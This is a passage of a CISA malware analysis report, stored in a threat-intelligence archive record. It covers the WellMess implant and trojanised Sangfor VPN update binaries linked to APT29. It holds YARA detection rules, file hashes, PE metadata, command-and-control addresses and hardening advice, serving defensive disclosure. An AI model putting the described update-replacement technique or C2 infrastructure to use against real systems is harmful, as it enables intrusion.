\"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 12 of 19\n\n$9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2019-03-01 10:20:20-05:00\r\nImport Hash daf2da52475fd8981b19ec3c321a983c\r\nCompany Name Sangfor Technologies Co.,Ltd\r\nFile Description SangforUD\r\nInternal Name SangforUD.exe\r\nLegal Copyright Copyright (C) 2015\r\nOriginal Filename SangforUD.EXE\r\nProduct Name SangforUD application\r\nProduct Version 7.6.0.100\r\nPE Sections\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 13 of 19\n\nMD5 Name Raw Size Entropy\r\n1cd19b3151a670e3d1d2a24953392004 header 1024 3.025361\r\n98e91043bf45d10a621d72a2e3200ed0 .text 232960 6.609761\r\naa6f1abb810df36035bc35cf27c68d59 .rdata 72704 5.619637\r\nc947f4e73cc3503e16ce6173df639c87 .data 4608 3.792666\r\n1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393\r\nec6c94b5135c0c75d0a8b7288b77cbae .rsrc 103936 3.885931\r\nb744db87f1a59d6af2a5a37c0da519d1 .reloc 12288 6.571358\r\nPackers/Compilers/Cryptors\r\nRelationships\r\n58d8e65976... Connected_To 103.216.221.19\r\nDescription\r\nThis file is a 32-bit Windows executable and is similar in design and structure to the file\r\n65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75. This application is also designed to replace\r\nthe update binaries served out from Sangfor SSL VPN devices. This malware uses the hard-coded C2 IP address\r\n103.216.221.19 to download additional payloads.\r\na4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\r\nTags\r\ntrojan\r\nDetails\r\nName a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\r\nSize 434688 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 a32e1202257a2945bf0f878c58490af8\r\nSHA1 416df2d22338f412571cdaedb40ab33eb38977af\r\nSHA256 a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\r\nSHA512 92ac91e36fc9a8463b2a7b00e6dba687e86a15484d836cb2c8d399d76cd012b71523a9ddae43d9795e2c14fdb7ccc2137d668f7c691b47a2\r\nssdeep 6144:4t4156qfXqT02bFXCYv123kUo4GECAOcL6xDE4U:oc6qkt5vdU6ECe4U\r\nEntropy 6.203383\r\nAntivirus\r\nAhnlab Malware/Win32.Generic\r\nAntiy GrayWare/Win32.Uwasson\r\nESET Win32/Spy.Agent.PXZ trojan\r\nIkarus Trojan-Spy.Agent\r\nK7 Riskware ( 0040eff71 )\r\nMcAfee RDN/Generic.cf\r\nMicrosoft Security Essentials Trojan:Win32/Occamy.C\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 14 of 19\n\nNetGate Trojan.Win32.Malware\r\nVirusBlokAda Trojan.Agentb\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 15 of 19\n\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-12 10:02:59-04:00\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 16 of 19\n\nImport Hash a723dab3d5a36cc8ad0ef65a0d4cfb3d\r\nCompany Name Sangfor Technologies Co.,Ltd\r\nFile Description SangforUD\r\nInternal Name SangforUD.exe\r\nLegal Copyright Copyright (C) 2015\r\nOriginal Filename SangforUD.EXE\r\nProduct Name SangforUD application\r\nProduct Version 7.6.0.100\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\ned096fa6a0d25049398750d840d02748 header 1024 3.038012\r\n0f2de5a1546886f5cb9876d918d333bf .text 238080 6.593105\r\n398a48e3a63f160340ba9720a3f13bc8 .rdata 73728 5.589507\r\n6f25e38b602834c202db365468104061 .data 4608 3.709410\r\n1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393\r\n093889615fb3f28b9066f7dc93650099 .rsrc 103936 3.885922\r\nd404cb13c9f033a5b71c2d31cf474e6f .reloc 12800 6.522532\r\nPackers/Compilers/Cryptors\r\nRelationships\r\na4b790ddff... Connected_To 192.168.169.103\r\nDescription\r\nThis file is a 32-bit Windows executable and is similar in design and structure to the file\r\n65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75. This application is also designed to replace\r\nthe update binaries served out from Sangfor SSL VPN devices. It uses the private IP address 192.168.169.103 as a C2 server.\r\n192.168.169.103\r\nWhois\r\nQueried whois.arin.net with \"n 192.168.169.103\"...\r\nNetRange:     192.168.0.0 - 192.168.255.255\r\nCIDR:         192.168.0.0/16\r\nNetName:        PRIVATE-ADDRESS-CBLK-RFC1918-IANA-RESERVED\r\nNetHandle:     NET-192-168-0-0-1\r\nParent:         NET192 (NET-192-0-0-0-0)\r\nNetType:        IANA Special Use\r\nOrganization: Internet Assigned Numbers Authority (IANA)\r\nRegDate:        1994-03-15\r\nUpdated:        2013-08-30\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 17 of 19\n\nComment:        These addresses are in use by many millions of independently operated networks, which might be as small as\r\na single computer connected to a home gateway, and are automatically configured in hundreds of millions of devices. They\r\nare only intended for use within a private context and traffic that needs to cross the Internet will need to use a different,\r\nunique address.\r\nComment:        These addresses can be used by anyone without any need to coordinate with IANA or an Internet registry.\r\nThe traffic from these addresses does not come from ICANN or IANA. We are not the source of activity you may see on\r\nlogs or in e-mail records. Please refer to http://www.iana.org/abuse/answers\r\nComment:        These addresses were assigned by the IETF, the organization that develops Internet protocols, in the Best\r\nCurrent Practice document, RFC 1918 which can be found at:\r\nComment:        http://datatracker.ietf.org/doc/rfc1918\r\nRef:            https://rdap.arin.net/registry/ip/192.168.0.0\r\nOrgName:        Internet Assigned Numbers Authority\r\nOrgId:         IANA\r\nAddress:        12025 Waterfront Drive\r\nAddress:        Suite 300\r\nCity:         Los Angeles\r\nStateProv:     CA\r\nPostalCode:     90292\r\nCountry:        US\r\nUpdated:        2012-08-31\r\nRef:            https://rdap.arin.net/registry/entity/IANA\r\nRelationships\r\n192.168.169.103 Connected_From a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\r\nDescription\r\na4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064 attempts to connect to the private IP address.\r\nRelationship Summary\r\n65495d173e... Connected_To 103.216.221.19\r\n103.216.221.19 Connected_From 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\r\n103.216.221.19 Connected_From 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\r\n58d8e65976... Connected_To 103.216.221.19\r\na4b790ddff... Connected_To 192.168.169.103\r\n192.168.169.103 Connected_From a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 18 of 19\n\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nRevisions\r\nJuly 16, 2020: Initial Version\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a" ], "report_names": [ "ar20-198a" ], "threat_actors": [ { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434481, "ts_updated_at": 1775826719, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/448f393460de04c59c1205a79cf61e1ee1d6909f.pdf", "text": "https://archive.orkl.eu/448f393460de04c59c1205a79cf61e1ee1d6909f.txt", "img": "https://archive.orkl.eu/448f393460de04c59c1205a79cf61e1ee1d6909f.jpg" } }